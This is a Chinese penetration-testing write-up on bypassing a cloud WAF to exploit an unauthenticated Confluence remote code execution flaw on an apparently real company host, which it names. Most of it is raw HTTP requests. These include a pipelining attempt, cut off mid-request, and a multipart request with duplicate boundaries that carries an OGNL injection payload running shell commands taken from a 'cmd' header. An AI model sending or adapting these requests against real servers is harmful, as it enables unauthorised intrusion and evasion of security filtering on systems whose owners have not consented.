【实战】一次基于HTTP协议的云WAF绕过记录
日常渗透发现的某企业存在Confluence未授权rce的漏洞,隔了一个周末后发现被waf拦截了,所以多了个和waf对抗的故事......
1、HTTP隧道传输/ HTTP pipeline【失败】
通过使用 Connection: keep-alive 达到一次传输多个http包的效果;
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Connection: keep-alive Content-Length: 203 queryString=aPOST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: help.hualala.com Content-Type: application/x-www-form-urlencoded Connection: keep-alive cmd: pwd queryString={
2、分块传输/ Chunked Transfer (HTTP 1.1)【失败】
插件:http://github.com/c0ny1/chunked-coding-converter
3、HTTP协议未覆盖【成功】
利用 Content-type: multipart/form-data绕过上传的边界(boundary)限制。
通过多boundary定义,使waf检测范围和实际上传范围不一致,从而绕过waf上传恶意内容:
POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------998091706;boundary=--------998091705 X-Requested-With: XMLHttpRequest x-atlassian-mau-ignore: true Content-Length: 678 Connection: close Cookie: JSESSIONID=E4513E8589FBD6AB5128994E87ADA4D0 cmd: id ----------998091706 Content-Disposition: form-data; name="queryString" sss ----------998091706-- ----------998091705 Content-Disposition: form-data; name="queryString" \u0027+#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var c=com.atlassian.core.filters.ServletContextThreadLocal.getRequest().getHeader(\u0027cmd\u0027);var x=java.lang.Runtime.getRuntime().exec(c);var out=com.atlassian.core.filters.ServletContextThreadLocal.getResponse().getOutputStream();org.apache.commons.io.IOUtils.copy(x.getInputStream(),out);out.flush();\u0022)}+\u0027 ----------998091705--
高并发、垃圾数据都尝试了,均未成功,就不放截图了。